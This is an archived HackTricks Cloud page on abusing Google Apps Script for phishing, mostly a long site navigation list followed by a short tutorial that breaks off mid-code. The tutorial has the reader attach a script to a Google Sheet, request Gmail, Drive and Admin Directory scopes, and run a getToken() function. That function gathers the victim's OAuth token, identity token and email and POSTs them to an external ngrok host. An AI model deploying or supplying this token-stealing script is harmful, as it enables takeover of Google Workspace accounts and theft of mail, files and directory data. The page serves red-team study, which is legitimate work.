{
	"id": "f8178ac0-f027-4cab-94e1-cea9969b8645",
	"created_at": "2026-04-06T00:14:45.847122Z",
	"updated_at": "2026-04-10T03:26:37.567342Z",
	"deleted_at": null,
	"sha1_hash": "2bc8943ba8d73c41d4563335ee8e7e1a758e911a",
	"title": "GWS - App Scripts - HackTricks Cloud",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3423934,
	"plain_text": "GWS - App Scripts - HackTricks Cloud\r\nArchived: 2026-04-05 18:34:24 UTC\r\n\u003c\u003c\r\n1.\r\n2. 👽 Welcome!\r\n3. HackTricks Cloud\r\n4. About the Author ↗\r\n5. HackTricks Values \u0026 faq ↗\r\n6.\r\n7. 🏭 Pentesting CI/CD\r\n8. Pentesting CI/CD Methodology\r\n9. Docker Build Context Abuse in Cloud Envs\r\n10. Gitblit Security\r\n1. Ssh Auth Bypass\r\n11. Github Security\r\n1. Abusing Github Actions\r\n1. Gh Actions - Artifact Poisoning\r\n2. GH Actions - Cache Poisoning\r\n3. Gh Actions - Context Script Injections\r\n2. Accessible Deleted Data in Github\r\n3. Basic Github Information\r\n12. Gitea Security\r\n1. Basic Gitea Information\r\n13. Concourse Security\r\n1. Concourse Architecture\r\n2. Concourse Lab Creation\r\n3. Concourse Enumeration \u0026 Attacks\r\n14. CircleCI Security\r\n15. TravisCI Security\r\n1. Basic TravisCI Information\r\n16. Jenkins Security\r\n1. Basic Jenkins Information\r\n2. Jenkins RCE with Groovy Script\r\n3. Jenkins RCE Creating/Modifying Project\r\n4. Jenkins RCE Creating/Modifying Pipeline\r\n5. Jenkins Arbitrary File Read to RCE via \"Remember Me\"\r\n6. Jenkins Dumping Secrets from Groovy\r\n17. Apache Airflow Security\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 1 of 33\n\n1. Airflow Configuration\r\n2. Airflow RBAC\r\n18. Terraform Security\r\n19. Atlantis Security\r\n20. Cloudflare Security\r\n1. Cloudflare Domains\r\n2. Cloudflare Workers Pass Through Proxy Ip Rotation\r\n3. Cloudflare Zero Trust Network\r\n21. Okta Security\r\n1. Okta Hardening\r\n22. Serverless.com Security\r\n23. Supabase Security\r\n24. Check Automate Security\r\n1. Chef Automate Enumeration And Attacks\r\n25. Vercel Security\r\n26. Ansible Tower / AWX / Automation controller Security\r\n27. TODO\r\n28.\r\n29. ⛈️ Pentesting Cloud\r\n30. Pentesting Cloud Methodology\r\n1. Luks2 Header Malleability Null Cipher Abuse\r\n31. Kubernetes Pentesting\r\n1. Kubernetes Basics\r\n2. Pentesting Kubernetes Services\r\n1. Kubelet Authentication \u0026 Authorization\r\n3. Exposing Services in Kubernetes\r\n4. Attacking Kubernetes from inside a Pod\r\n5. Kubernetes Enumeration\r\n6. Kubernetes Role-Based Access Control(RBAC)\r\n7. Abusing Roles/ClusterRoles in Kubernetes\r\n1. Pod Escape Privileges\r\n2. Kubernetes Roles Abuse Lab\r\n8. Kubernetes Namespace Escalation\r\n9. Kubernetes External Secret Operator\r\n10. Kubernetes Pivoting to Clouds\r\n11. Kubernetes Network Attacks\r\n12. Kubernetes Hardening\r\n1. Kubernetes SecurityContext(s)\r\n13. Kubernetes OPA Gatekeeper\r\n1. Kubernetes OPA Gatekeeper bypass\r\n14. Kubernetes Kyverno\r\n1. Kubernetes Kyverno bypass\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 2 of 33\n\n15. Kubernetes ValidatingWebhookConfiguration\r\n32. GCP Pentesting\r\n1. GCP - Basic Information\r\n1. GCP - Federation Abuse\r\n2. GCP - Permissions for a Pentest\r\n3. GCP - Post Exploitation\r\n1. GCP - Apigee Post Exploitation\r\n2. GCP - App Engine Post Exploitation\r\n3. GCP - Artifact Registry Post Exploitation\r\n4. GCP - Bigtable Post Exploitation\r\n5. GCP - Cloud Build Post Exploitation\r\n6. GCP - Cloud Functions Post Exploitation\r\n7. GCP - Cloud Run Post Exploitation\r\n8. GCP - Cloud Shell Post Exploitation\r\n9. GCP - Cloud SQL Post Exploitation\r\n10. GCP - Compute Post Exploitation\r\n11. GCP - Dataflow Post Exploitation\r\n12. GCP - Filestore Post Exploitation\r\n13. GCP - IAM Post Exploitation\r\n14. GCP - KMS Post Exploitation\r\n15. GCP - Logging Post Exploitation\r\n16. GCP - Monitoring Post Exploitation\r\n17. GCP - Pub/Sub Post Exploitation\r\n18. GCP - Secretmanager Post Exploitation\r\n19. GCP - Security Post Exploitation\r\n20. GCP - Workflows Post Exploitation\r\n21. GCP - Storage Post Exploitation\r\n4. GCP - Privilege Escalation\r\n1. GCP - Apikeys Privesc\r\n2. GCP - AppEngine Privesc\r\n3. GCP - Artifact Registry Privesc\r\n4. GCP - Batch Privesc\r\n5. GCP - BigQuery Privesc\r\n6. GCP - Bigtable Privesc\r\n7. GCP - ClientAuthConfig Privesc\r\n8. GCP - Cloud Workstations Privesc\r\n9. GCP - Cloudbuild Privesc\r\n10. GCP - Cloudfunctions Privesc\r\n11. GCP - Cloudidentity Privesc\r\n12. GCP - Cloud Scheduler Privesc\r\n13. GCP - Cloud Tasks Privesc\r\n14. GCP - Compute Privesc\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 3 of 33\n\n1. GCP - Add Custom SSH Metadata\r\n15. GCP - Composer Privesc\r\n16. GCP - Container Privesc\r\n17. GCP - Dataproc Privesc\r\n18. GCP - Dataflow Privesc\r\n19. GCP - Deploymentmaneger Privesc\r\n20. GCP - IAM Privesc\r\n21. GCP - KMS Privesc\r\n22. GCP - Firebase Privesc\r\n23. GCP - Orgpolicy Privesc\r\n24. GCP - Pubsub Privesc\r\n25. GCP - Resourcemanager Privesc\r\n26. GCP - Run Privesc\r\n27. GCP - Secretmanager Privesc\r\n28. GCP - Serviceusage Privesc\r\n29. GCP - Sourcerepos Privesc\r\n30. GCP - Storage Privesc\r\n31. GCP - Vertex AI Privesc\r\n32. GCP - Workflows Privesc\r\n33. GCP - Generic Permissions Privesc\r\n34. GCP - Network Docker Escape\r\n35. GCP - local privilege escalation ssh pivoting\r\n5. GCP - Persistence\r\n1. GCP - API Keys Persistence\r\n2. GCP - App Engine Persistence\r\n3. GCP - Artifact Registry Persistence\r\n4. GCP - BigQuery Persistence\r\n5. GCP - Bigtable Persistence\r\n6. GCP - Cloud Functions Persistence\r\n7. GCP - Cloud Run Persistence\r\n8. GCP - Cloud Shell Persistence\r\n9. GCP - Cloud SQL Persistence\r\n10. GCP - Compute Persistence\r\n11. GCP - Dataflow Persistence\r\n12. GCP - Filestore Persistence\r\n13. GCP - Logging Persistence\r\n14. GCP - Secret Manager Persistence\r\n15. GCP - Storage Persistence\r\n16. GCP - Token Persistence\r\n6. GCP - Services\r\n1. GCP - AI Platform Enum\r\n2. GCP - API Keys Enum\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 4 of 33\n\n3. GCP - App Engine Enum\r\n4. GCP - Artifact Registry Enum\r\n5. GCP - Batch Enum\r\n6. GCP - Bigquery Enum\r\n7. GCP - Bigtable Enum\r\n8. GCP - Cloud Build Enum\r\n9. GCP - Cloud Functions Enum\r\n10. GCP - Cloud Run Enum\r\n11. GCP - Cloud Shell Enum\r\n12. GCP - Cloud SQL Enum\r\n13. GCP - Cloud Scheduler Enum\r\n14. GCP - Compute Enum\r\n1. GCP - Compute Instances\r\n2. GCP - VPC \u0026 Networking\r\n15. GCP - Composer Enum\r\n16. GCP - Containers \u0026 GKE Enum\r\n17. GCP - Dataflow Enum\r\n18. GCP - Dataproc Enum\r\n19. GCP - DNS Enum\r\n20. GCP - Filestore Enum\r\n21. GCP - Firebase Enum\r\n22. GCP - Firestore Enum\r\n23. GCP - IAM, Principals \u0026 Org Policies Enum\r\n24. GCP - KMS Enum\r\n25. GCP - Logging Enum\r\n26. GCP - Memorystore Enum\r\n27. GCP - Monitoring Enum\r\n28. GCP - Pub/Sub Enum\r\n29. GCP - Secrets Manager Enum\r\n30. GCP - Security Enum\r\n31. GCP - Source Repositories Enum\r\n32. GCP - Spanner Enum\r\n33. GCP - Stackdriver Enum\r\n34. GCP - Storage Enum\r\n35. GCP - Vertex AI Enum\r\n36. GCP - Workflows Enum\r\n7. GCP \u003c--\u003e Workspace Pivoting\r\n1. GCP - Understanding Domain-Wide Delegation\r\n8. GCP - Unauthenticated Enum \u0026 Access\r\n1. GCP - API Keys Unauthenticated Enum\r\n2. GCP - App Engine Unauthenticated Enum\r\n3. GCP - Artifact Registry Unauthenticated Enum\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 5 of 33\n\n4. GCP - Cloud Build Unauthenticated Enum\r\n5. GCP - Cloud Functions Unauthenticated Enum\r\n6. GCP - Cloud Run Unauthenticated Enum\r\n7. GCP - Cloud SQL Unauthenticated Enum\r\n8. GCP - Compute Unauthenticated Enum\r\n9. GCP - IAM, Principals \u0026 Org Unauthenticated Enum\r\n10. GCP - Source Repositories Unauthenticated Enum\r\n11. GCP - Storage Unauthenticated Enum\r\n1. GCP - Public Buckets Privilege Escalation\r\n33. GWS - Workspace Pentesting\r\n1. GWS - Post Exploitation\r\n2. GWS - Persistence\r\n3. GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD \u0026 EntraID)\r\n1. GWS - Admin Directory Sync\r\n2. GCDS - Google Cloud Directory Sync\r\n3. GCPW - Google Credential Provider for Windows\r\n4. GPS - Google Password Sync\r\n4. GWS - Google Platforms Phishing\r\n1. GWS - App Scripts\r\n34. AWS Pentesting\r\n1. AWS - Basic Information\r\n1. AWS - Federation Abuse\r\n2. AWS - Permissions for a Pentest\r\n3. AWS - Persistence\r\n1. AWS - API Gateway Persistence\r\n2. AWS - Cloudformation Persistence\r\n3. AWS - Cognito Persistence\r\n4. AWS - DynamoDB Persistence\r\n5. AWS - EC2 Persistence\r\n1. AWS - EC2 ReplaceRootVolume Task (Stealth Backdoor / Persistence)\r\n6. AWS - ECR Persistence\r\n7. AWS - ECS Persistence\r\n8. AWS - Elastic Beanstalk Persistence\r\n9. AWS - EFS Persistence\r\n10. AWS - IAM Persistence\r\n11. AWS - KMS Persistence\r\n12. AWS - Lambda Persistence\r\n1. AWS - Abusing Lambda Extensions\r\n2. AWS - Lambda Alias Version Policy Backdoor\r\n3. AWS - Lambda Async Self Loop Persistence\r\n4. AWS - Lambda Layers Persistence\r\n5. AWS - Lambda Exec Wrapper Persistence\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 6 of 33\n\n13. AWS - Lightsail Persistence\r\n14. AWS - RDS Persistence\r\n15. AWS - S3 Persistence\r\n16. Aws Sagemaker Persistence\r\n17. AWS - SNS Persistence\r\n18. AWS - Secrets Manager Persistence\r\n19. AWS - SQS Persistence\r\n1. AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy\r\n2. AWS - SQS OrgID Policy Backdoor\r\n20. AWS - SSM Perssitence\r\n21. AWS - Step Functions Persistence\r\n22. AWS - STS Persistence\r\n4. AWS - Post Exploitation\r\n1. AWS - API Gateway Post Exploitation\r\n2. AWS - Bedrock Post Exploitation\r\n3. AWS - CloudFront Post Exploitation\r\n4. AWS - CodeBuild Post Exploitation\r\n1. AWS Codebuild - Token Leakage\r\n2. AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)\r\n5. AWS - Control Tower Post Exploitation\r\n6. AWS - DLM Post Exploitation\r\n7. AWS - DynamoDB Post Exploitation\r\n8. AWS - EC2, EBS, SSM \u0026 VPC Post Exploitation\r\n1. AWS - EBS Snapshot Dump\r\n2. AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)\r\n3. AWS - Live Data Theft via EBS Multi-Attach\r\n4. AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection\r\n5. AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)\r\n6. AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation\r\n7. AWS - Security Group Backdoor via Managed Prefix Lists\r\n8. AWS – Egress Bypass from Isolated Subnets via VPC Endpoints\r\n9. AWS - VPC Flow Logs Cross-Account Exfiltration to S3\r\n10. AWS - Malicious VPC Mirror\r\n9. AWS - ECR Post Exploitation\r\n10. AWS - ECS Post Exploitation\r\n11. AWS - EFS Post Exploitation\r\n12. AWS - EKS Post Exploitation\r\n13. AWS - Elastic Beanstalk Post Exploitation\r\n14. AWS - IAM Post Exploitation\r\n15. AWS - KMS Post Exploitation\r\n16. AWS - Lambda Post Exploitation\r\n1. AWS - Lambda EFS Mount Injection\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 7 of 33\n\n2. AWS - Lambda Event Source Mapping Hijack\r\n3. AWS - Lambda Function URL Public Exposure\r\n4. AWS - Lambda LoggingConfig Redirection\r\n5. AWS - Lambda Runtime Pinning Abuse\r\n6. AWS - Lambda Steal Requests\r\n7. AWS - Lambda VPC Egress Bypass\r\n17. AWS - Lightsail Post Exploitation\r\n18. AWS - MWAA Post Exploitation\r\n19. AWS - Organizations Post Exploitation\r\n20. AWS - RDS Post Exploitation\r\n21. AWS - SageMaker Post-Exploitation\r\n1. Feature Store Poisoning\r\n22. AWS - S3 Post Exploitation\r\n23. AWS - Secrets Manager Post Exploitation\r\n24. AWS - SES Post Exploitation\r\n25. AWS - SNS Post Exploitation\r\n1. AWS - SNS Message Data Protection Bypass via Policy Downgrade\r\n2. SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription\r\n3. AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)\r\n26. AWS - SQS Post Exploitation\r\n1. AWS – SQS DLQ Redrive Exfiltration via StartMessageMoveTask\r\n2. AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy\r\n27. AWS - SSO \u0026 identitystore Post Exploitation\r\n28. AWS - Step Functions Post Exploitation\r\n29. AWS - STS Post Exploitation\r\n30. AWS - VPN Post Exploitation\r\n31. Readme\r\n5. AWS - Privilege Escalation\r\n1. AWS - Apigateway Privesc\r\n2. AWS - AppRunner Privesc\r\n3. AWS - Bedrock Privesc\r\n4. AWS - Chime Privesc\r\n5. AWS - CloudFront\r\n6. AWS - Codebuild Privesc\r\n7. AWS - Codepipeline Privesc\r\n8. AWS - Codestar Privesc\r\n1. codestar:CreateProject, codestar:AssociateTeamMember\r\n2. iam:PassRole, codestar:CreateProject\r\n9. AWS - Cloudformation Privesc\r\n1. iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks\r\n10. AWS - Cognito Privesc\r\n11. AWS - Datapipeline Privesc\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 8 of 33\n\n12. AWS - Directory Services Privesc\r\n13. AWS - DynamoDB Privesc\r\n14. AWS - EBS Privesc\r\n15. AWS - EC2 Privesc\r\n16. AWS - ECR Privesc\r\n17. AWS - ECS Privesc\r\n18. AWS - EFS Privesc\r\n19. AWS - Elastic Beanstalk Privesc\r\n20. AWS - EMR Privesc\r\n21. AWS - EventBridge Scheduler Privesc\r\n22. AWS - Gamelift\r\n23. AWS - Glue Privesc\r\n24. AWS - IAM Privesc\r\n25. AWS - KMS Privesc\r\n26. AWS - Lambda Privesc\r\n27. AWS - Lightsail Privesc\r\n28. AWS - Macie Privesc\r\n29. AWS - Mediapackage Privesc\r\n30. AWS - MQ Privesc\r\n31. AWS - MSK Privesc\r\n32. AWS - RDS Privesc\r\n33. AWS - Redshift Privesc\r\n34. AWS - Route53 Privesc\r\n35. AWS - SNS Privesc\r\n36. AWS - SQS Privesc\r\n37. AWS - SSO \u0026 identitystore Privesc\r\n38. AWS - Organizations Privesc\r\n39. AWS - S3 Privesc\r\n40. AWS - Sagemaker Privesc\r\n41. AWS - Secrets Manager Privesc\r\n42. AWS - SSM Privesc\r\n43. AWS - Step Functions Privesc\r\n44. AWS - STS Privesc\r\n45. AWS - WorkDocs Privesc\r\n6. AWS - Services\r\n1. AWS - Security \u0026 Detection Services\r\n1. AWS - CloudTrail Enum\r\n2. AWS - CloudWatch Enum\r\n3. AWS - Config Enum\r\n4. AWS - Control Tower Enum\r\n5. AWS - Cost Explorer Enum\r\n6. AWS - Detective Enum\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 9 of 33\n\n7. AWS - Firewall Manager Enum\r\n8. AWS - GuardDuty Enum\r\n9. AWS - Inspector Enum\r\n10. AWS - Security Hub Enum\r\n11. AWS - Shield Enum\r\n12. AWS - Trusted Advisor Enum\r\n13. AWS - WAF Enum\r\n2. AWS - API Gateway Enum\r\n3. AWS - Bedrock Enum\r\n4. AWS - Certificate Manager (ACM) \u0026 Private Certificate Authority (PCA)\r\n5. AWS - CloudFormation \u0026 Codestar Enum\r\n6. AWS - CloudHSM Enum\r\n7. AWS - CloudFront Enum\r\n8. AWS - Codebuild Enum\r\n9. AWS - Cognito Enum\r\n1. Cognito Identity Pools\r\n2. Cognito User Pools\r\n10. AWS - DataPipeline, CodePipeline \u0026 CodeCommit Enum\r\n11. AWS - Directory Services / WorkDocs Enum\r\n12. AWS - DocumentDB Enum\r\n13. AWS - DynamoDB Enum\r\n14. AWS - EC2, EBS, ELB, SSM, VPC \u0026 VPN Enum\r\n1. AWS - Nitro Enum\r\n2. AWS - VPC \u0026 Networking Basic Information\r\n15. AWS - ECR Enum\r\n16. AWS - ECS Enum\r\n17. AWS - EKS Enum\r\n18. AWS - Elastic Beanstalk Enum\r\n19. AWS - ElastiCache\r\n20. AWS - EMR Enum\r\n21. AWS - EFS Enum\r\n22. AWS - EventBridge Scheduler Enum\r\n23. AWS - Kinesis Data Firehose Enum\r\n24. AWS - IAM, Identity Center \u0026 SSO Enum\r\n25. AWS - KMS Enum\r\n26. AWS - Lambda Enum\r\n27. AWS - Lightsail Enum\r\n28. AWS - Macie Enum\r\n29. AWS - MQ Enum\r\n30. AWS - MSK Enum\r\n31. AWS - Organizations Enum\r\n32. AWS - Redshift Enum\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 10 of 33\n\n33. AWS - Relational Database (RDS) Enum\r\n34. AWS - Route53 Enum\r\n35. AWS - SageMaker Enum\r\n36. AWS - Secrets Manager Enum\r\n37. AWS - SES Enum\r\n38. AWS - SNS Enum\r\n39. AWS - SQS Enum\r\n40. AWS - S3, Athena \u0026 Glacier Enum\r\n41. AWS - Step Functions Enum\r\n42. AWS - STS Enum\r\n43. AWS - Other Services Enum\r\n7. AWS - Unauthenticated Enum \u0026 Access\r\n1. AWS - Accounts Unauthenticated Enum\r\n2. AWS - API Gateway Unauthenticated Enum\r\n3. AWS - Cloudfront Unauthenticated Enum\r\n4. AWS - Cognito Unauthenticated Enum\r\n5. AWS - CodeBuild Unauthenticated Access\r\n6. AWS - DocumentDB Unauthenticated Enum\r\n7. AWS - DynamoDB Unauthenticated Access\r\n8. AWS - EC2 Unauthenticated Enum\r\n9. AWS - ECR Unauthenticated Enum\r\n10. AWS - ECS Unauthenticated Enum\r\n11. AWS - Elastic Beanstalk Unauthenticated Enum\r\n12. AWS - Elasticsearch Unauthenticated Enum\r\n13. AWS - IAM \u0026 STS Unauthenticated Enum\r\n14. AWS - Identity Center \u0026 SSO Unauthenticated Enum\r\n15. AWS - IoT Unauthenticated Enum\r\n16. AWS - Kinesis Video Unauthenticated Enum\r\n17. AWS - Lambda Unauthenticated Access\r\n18. AWS - Media Unauthenticated Enum\r\n19. AWS - MQ Unauthenticated Enum\r\n20. AWS - MSK Unauthenticated Enum\r\n21. AWS - RDS Unauthenticated Enum\r\n22. AWS - Redshift Unauthenticated Enum\r\n23. AWS - SageMaker Unauthenticated Enum\r\n24. AWS - SQS Unauthenticated Enum\r\n25. AWS - SNS Unauthenticated Enum\r\n26. AWS - S3 Unauthenticated Enum\r\n35. Azure Pentesting\r\n1. Az - Basic Information\r\n1. Az Federation Abuse\r\n2. Az - Tokens \u0026 Public Applications\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 11 of 33\n\n2. Az - Enumeration Tools\r\n3. Az - Unauthenticated Enum \u0026 Initial Entry\r\n1. Az - Container Registry Unauth\r\n2. Az - OAuth Apps Phishing\r\n3. Az - Storage Unauth\r\n4. Az - VMs Unauth\r\n5. Az - Device Code Authentication Phishing\r\n6. Az - Password Spraying\r\n4. Az - Services\r\n1. Az - Entra ID (AzureAD) \u0026 Azure IAM\r\n2. Az - ACR\r\n3. Az - API Management\r\n4. Az - Application Proxy\r\n5. Az - ARM Templates / Deployments\r\n6. Az - Automation Accounts\r\n7. Az - Azure App Services\r\n8. Az - AI Foundry\r\n9. Az - Cloud Shell\r\n10. Az - Container Registry\r\n11. Az - Container Instances, Apps \u0026 Jobs\r\n12. Az - CosmosDB\r\n13. Az - Defender\r\n14. Az - File Shares\r\n15. Az - Front Door\r\n16. Az - Function Apps\r\n17. Az - Intune\r\n18. Az - Key Vault\r\n19. Az - Logic Apps\r\n20. Az - Management Groups, Subscriptions \u0026 Resource Groups\r\n21. Az - Misc\r\n22. Az - Monitoring\r\n23. Az - MySQL\r\n24. Az - PostgreSQL\r\n25. Az - Queue Storage\r\n26. Az - Sentinel\r\n27. Az - Service Bus\r\n28. Az - SQL\r\n29. Az - Static Web Applications\r\n30. Az - Storage Accounts \u0026 Blobs\r\n31. Az - Table Storage\r\n32. Az - Virtual Desktop\r\n33. Az - Virtual Machines \u0026 Network\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 12 of 33\n\n1. Az - Azure Network\r\n5. Az - Permissions for a Pentest\r\n6. Az - Lateral Movement (Cloud - On-Prem)\r\n1. Az - Arc vulnerable GPO Deploy Script\r\n2. Az - Cloud Kerberos Trust\r\n3. Az - Cloud Sync\r\n4. Az - Connect Sync\r\n5. Az - Domain Services\r\n6. Az - Federation\r\n7. Az - Hybrid Identity Misc Attacks\r\n8. Az - Exchange Hybrid Impersonation (ACS Actor Tokens)\r\n9. Az - Local Cloud Credentials\r\n10. Az - Pass the Certificate\r\n11. Az - Pass the Cookie\r\n12. Az - Primary Refresh Token (PRT)\r\n13. Az - PTA - Pass-through Authentication\r\n14. Az - Seamless SSO\r\n7. Az - Post Exploitation\r\n1. Az API Management Post Exploitation\r\n2. Az Azure Ai Foundry Post Exploitation\r\n3. Az - Blob Storage Post Exploitation\r\n4. Az - CosmosDB Post Exploitation\r\n5. Az - File Share Post Exploitation\r\n6. Az - Function Apps Post Exploitation\r\n7. Az - Key Vault Post Exploitation\r\n8. Az - Logic Apps Post Exploitation\r\n9. Az - MySQL Post Exploitation\r\n10. Az - PostgreSQL Post Exploitation\r\n11. Az - Queue Storage Post Exploitation\r\n12. Az - Service Bus Post Exploitation\r\n13. Az - Table Storage Post Exploitation\r\n14. Az - SQL Post Exploitation\r\n15. Az - Virtual Desktop Post Exploitation\r\n16. Az - VMs \u0026 Network Post Exploitation\r\n8. Az - Privilege Escalation\r\n1. Az - Azure IAM Privesc (Authorization)\r\n2. Az - AI Foundry Privesc\r\n3. Az - API Management Privesc\r\n4. Az - App Services Privesc\r\n5. Az - Automation Accounts Privesc\r\n6. Az - Container Registry Privesc\r\n7. Az - Container Instances, Apps \u0026 Jobs Privesc\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 13 of 33\n\n8. Az - CosmosDB Privesc\r\n9. Az - EntraID Privesc\r\n1. Az - Conditional Access Policies \u0026 MFA Bypass\r\n2. Az - Dynamic Groups Privesc\r\n10. Az - Functions App Privesc\r\n11. Az - Key Vault Privesc\r\n12. Az - Logic Apps Privesc\r\n13. Az - MySQL Privesc\r\n14. Az - PostgreSQL Privesc\r\n15. Az - Queue Storage Privesc\r\n16. Az - Service Bus Privesc\r\n17. Az - Static Web App Privesc\r\n18. Az - Storage Privesc\r\n19. Az - SQL Privesc\r\n20. Az - Virtual Desktop Privesc\r\n21. Az - Virtual Machines \u0026 Network Privesc\r\n9. Az - Persistence\r\n1. Az - Automation Accounts Persistence\r\n2. Az - Cloud Shell Persistence\r\n3. Az - Logic Apps Persistence\r\n4. Az - SQL Persistence\r\n5. Az - Queue Storage Persistence\r\n6. Az - VMs Persistence\r\n7. Az - Storage Persistence\r\n10. Az - Device Registration\r\n36. Digital Ocean Pentesting\r\n1. DO - Basic Information\r\n2. DO - Permissions for a Pentest\r\n3. DO - Services\r\n1. DO - Apps\r\n2. DO - Container Registry\r\n3. DO - Databases\r\n4. DO - Droplets\r\n5. DO - Functions\r\n6. DO - Images\r\n7. DO - Kubernetes (DOKS)\r\n8. DO - Networking\r\n9. DO - Projects\r\n10. DO - Spaces\r\n11. DO - Volumes\r\n37. IBM Cloud Pentesting\r\n1. IBM - Hyper Protect Crypto Services\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 14 of 33\n\n2. IBM - Hyper Protect Virtual Server\r\n3. IBM - Basic Information\r\n38. OpenShift Pentesting\r\n1. OpenShift - Basic information\r\n2. Openshift - SCC\r\n3. OpenShift - Jenkins\r\n1. OpenShift - Jenkins Build Pod Override\r\n4. OpenShift - Privilege Escalation\r\n1. OpenShift - Missing Service Account\r\n2. OpenShift - Tekton\r\n3. OpenShift - SCC bypass\r\n39.\r\n40. 🛫 Pentesting Network Services\r\n41. HackTricks Pentesting Network ↗\r\n42. HackTricks Pentesting Services ↗\r\nGWS - App Scripts\r\nTip\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 15 of 33\n\nLearn \u0026 practice AWS Hacking:\r\nHackTricks Training AWS Red Team Expert (ARTE)\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 16 of 33\n\nLearn \u0026 practice GCP Hacking:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 17 of 33\n\nHackTricks Training GCP Red Team Expert (GRTE)\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 18 of 33\n\nLearn \u0026 practice Az Hacking:\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 19 of 33\n\nHackTricks Training Azure Red Team Expert (AzRTE)\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 20 of 33\n\nSupport HackTricks\r\nApp Scripts\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 21 of 33\n\nApp Scripts is code that will be triggered when a user with editor permission access the doc the App Script is\r\nlinked with and after accepting the OAuth prompt.\r\nThey can also be set to be executed every certain time by the owner of the App Script (Persistence).\r\nCreate App Script\r\nThere are several ways to create an App Script, although the most common ones are from a Google Document\r\n(of any type) and as a standalone project:\r\nCreate a container-bound project from Google Docs, Sheets, or Slides\r\nCreate a standalone project\r\nCreate a standalone project from Google Drive\r\nCreate a container-bound project from Google Forms\r\nCreate a standalone project using the clasp command line tool\r\nApp Script Scenario\r\nCreate Google Sheet with App Script\r\nStart by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to\r\nExtensions \u003e App Scripts , this will open a new App Script for you linked to the sheet.\r\nLeak token\r\nIn order to give access to the OAuth token you need to click on Services + and add scopes like:\r\nAdminDirectory: Access users and groups of the directory (if the user has enough permissions)\r\nGmail: To access gmail data\r\nDrive: To access drive data\r\nGoogle Sheets API: So it works with the trigger\r\nTo change yourself the needed scopes you can go to project settings and enable: Show \"appsscript.json\"\r\nmanifest file in editor .\r\nfunction getToken() {\r\n var userEmail = Session.getActiveUser().getEmail()\r\n var domain = userEmail.substring(userEmail.lastIndexOf(\"@\") + 1)\r\n var oauthToken = ScriptApp.getOAuthToken()\r\n var identityToken = ScriptApp.getIdentityToken()\r\n // Data json\r\n data = {\r\n oauthToken: oauthToken,\r\n identityToken: identityToken,\r\n email: userEmail,\r\n domain: domain,\r\nhttps://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts\r\nPage 22 of 33\n\n}\r\n // Send data\r\n makePostRequest(data)\r\n // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for\r\n // To ask for AdminDirectory permissions\r\n var pageToken = \"\"\r\n page = AdminDirectory.Users.list({\r\n domain: domain, // Use the extracted domain\r\n orderBy: \"givenName\",\r\n maxResults: 100,\r\n pageToken: pageToken,\r\n })\r\n // To ask for gmail permissions\r\n var threads = GmailApp.getInboxThreads(0, 10)\r\n // To ask for drive permissions\r\n var files = DriveApp.getFiles()\r\n}\r\nfunction makePostRequest(data) {\r\n var url = \"http://5.tcp.eu.ngrok.io:12027\"\r\n var options = {\r\n method: \"post\",\r\n contentType: \"application/json\",\r\n payload: 